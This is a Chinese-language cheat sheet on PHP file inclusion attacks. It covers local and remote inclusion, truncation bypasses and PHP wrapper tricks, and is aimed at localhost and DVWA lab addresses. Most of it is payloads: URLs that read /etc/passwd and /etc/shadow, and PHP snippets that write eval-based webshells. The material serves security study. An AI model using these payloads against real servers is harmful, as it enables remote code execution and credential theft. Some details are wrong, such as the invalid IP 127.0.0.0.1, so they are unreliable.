文件包含
开发人员会把重复使用的函数写到单个文件中,在使用函数某些特定的时候直接调用此文件称之为文件包含
文件包含漏洞的分类
本地文件包含(服务器上的本地文件)
远程文件包含(包含其他网站上的文件,比如一句话木马)
本地文件包含
无限制
http://127.0.0.0.1:8080/include.php?filename=1.txt
http://127.0.0.0.1:8080/include.php?filename=../../../shell.php
有限制
%00截断绕过,PHP版本<5.3.4
http://127.0.0.0.1:8080/include.php?filename=1.txt%00
长度截断绕过,Windows点号需要256,linux需要4096
http://127.0.0.0.1:8080/include.php?filename=1.txt/././././././././等
远程文件包含
无限制
http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt
有限制?绕过,%23绕过
http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt?
http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%23
http://127.0.0.0.1:8080/include.php?filename=http://www.xiaodi8.com/readme.txt%20
文件包含漏洞实现的功能
读取系统任意文件
http://127.0.0.0.1:8080/include.php?path=file:///etc/passswd
包含图片马直接获取webshell
http://127.0.0.0.1:8080/include.php?path=./webshell.png
包含图片写入shell
<?php fputs(fopen('shell.php','w'),"<?php @eval(\$_REQUEST['shell'])?>");?>
http://127.0.0.0.1:8080/include.php?path=./shell.png
包含文件写入webshell
写入一个1.txt文件
<?php
$myfile = fopen("1.php","w");
$txt = '<?php @eval($_REQUEST["cmd"]);?>';
fwrite($myfile,$txt);
fclose($myfile);
?>
然后包含文件
http://127.0.0.0.1:8080/include.php?path=1.php
PHP伪协议
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流、
php://input
php://input可以访问请求的原始数据的只读流,
将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,
可以将参数设为php://input,同时post想设置的文件内容,
php执行时会将post内容当作文件内容。
file://
访问本地系统文件
file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file:///etc/passwd
[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt
http:// https://
URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源,通常用于远程包含。
[http://网络路径和文件名]
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
php://
php:// 用于访问各个输入/输出流(I/O streams),经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码
读取文件源码
php://filter/read=convert.base64-encode/resource=[文件名]
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
执行php代码用法
php://input + [POST DATA]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
<?php system(ls);?>
<?php system('cat <flag.txt');?>
写入一句话木马
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
常见读取配置文件
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/passwd
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/shadow
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf
http://192.168.106.134/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf